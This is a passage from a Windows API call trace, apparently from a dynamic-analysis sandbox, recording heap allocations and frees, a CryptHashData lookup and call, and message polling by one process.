hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0117.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0117.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43caa00 [0117.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.915] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.916] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0117.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0117.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0117.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0117.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0117.918] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0117.919] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0117.919] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0117.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0117.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca880 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.919] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0117.920] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0117.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0117.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0117.921] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0117.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0117.921] RtlAllocateHeap 